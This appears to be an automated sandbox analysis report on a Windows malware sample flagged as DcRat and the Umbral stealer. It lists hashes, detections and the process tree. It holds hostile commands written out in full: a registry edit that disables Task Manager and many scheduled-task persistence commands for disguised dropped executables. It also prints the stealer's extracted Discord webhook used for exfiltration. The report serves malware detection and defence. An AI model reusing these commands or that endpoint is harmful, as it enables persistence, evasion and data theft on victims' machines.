Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-05-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
898A94F29EDC228CE3BD2054F3D5D6DD.exe
Resource
win7-20240221-en
General
-
Target
898A94F29EDC228CE3BD2054F3D5D6DD.exe
-
Size
4.3MB
-
MD5
898a94f29edc228ce3bd2054f3d5d6dd
-
SHA1
f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
-
SHA256
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
-
SHA512
8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
-
SSDEEP
49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1229451067175997500/jIKKpDize9BATyGRwJszp_dngrLcH2ykCNVKA2g8DaU3tS2rFJtimCYVQM10Zmvy_yF-
Signatures
-
DcRat 55 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Detect Umbral payload 3 IoCs
resource yara_rule
behavioral1/memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp family_umbral
behavioral1/files/0x000d000000012324-3.dat family_umbral
behavioral1/memory/2492-21-0x0000000000180000-0x00000000001C0000-memory.dmp family_umbral
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
resource yara_rule
behavioral1/memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp dcrat
behavioral1/files/0x0035000000013413-9.dat dcrat
behavioral1/files/0x0008000000013a6e-32.dat dcrat
behavioral1/memory/2692-36-0x0000000000D90000-0x0000000000FDA000-memory.dmp dcrat
behavioral1/memory/1976-93-0x0000000001300000-0x000000000154A000-memory.dmp dcrat
Disables Task Manager via registry modification
-
Executes dropped EXE 5 IoCs
pid Process
2492 stealer.exe
2592 чекер dc.exe
2516 Inject.exe
2692 driverBrokercommon.exe
1976 cmd.exe
Loads dropped DLL 6 IoCs
pid Process
2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe
2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe
2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe
2668 Process not Found
2388 cmd.exe
2388 cmd.exe
Drops file in Program Files directory 8 IoCs
description ioc Process
File created C:\Program Files (x86)\Microsoft Synchronization Services\088424020bedd6 driverBrokercommon.exe
File created C:\Program Files\DVD Maker\ja-JP\Inject.exe driverBrokercommon.exe
File created C:\Program Files\DVD Maker\ja-JP\652d253fe21f9b driverBrokercommon.exe
File created C:\Program Files\Common Files\csrss.exe driverBrokercommon.exe
File created C:\Program Files\Common Files\886983d96e3d3e driverBrokercommon.exe
File created C:\Program Files\Uninstall Information\csrss.exe driverBrokercommon.exe
File created C:\Program Files\Uninstall Information\886983d96e3d3e driverBrokercommon.exe
File created C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe driverBrokercommon.exe
Drops file in Windows directory 6 IoCs
description ioc Process
File created C:\Windows\en-US\24dbde2999530e driverBrokercommon.exe
File created C:\Windows\schemas\driverBrokercommon.exe driverBrokercommon.exe
File created C:\Windows\schemas\1cdec3972599ff driverBrokercommon.exe
File created C:\Windows\AppPatch\es-ES\explorer.exe driverBrokercommon.exe
File created C:\Windows\AppPatch\es-ES\7a0fd90576e088 driverBrokercommon.exe
File created C:\Windows\en-US\WmiPrvSE.exe driverBrokercommon.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies registry key 1 TTPs 1 IoCs
pid Process
2832 reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process
1976 cmd.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
Suspicious use of WriteProcessMemory 46 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"1⤵
- DcRat
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\stealer.exe"C:\Users\Admin\AppData\Local\Temp\stealer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\MsWinsessiondllNet\driverBrokercommon.exe"C:\MsWinsessiondllNet\driverBrokercommon.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1248
-
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs"8⤵PID:2280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs"8⤵PID:3068
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:2832
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Inject.exe"C:\Users\Admin\AppData\Local\Temp\Inject.exe"2⤵
- Executes dropped EXE
PID:2516
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InjectI" /sc MINUTE /mo 7 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Inject" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InjectI" /sc MINUTE /mo 13 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2560
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1252
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1700
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2740
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "driverBrokercommon" /sc ONLOGON /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2272
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604
Network
MITRE ATT&CK Enterprise v15
Downloads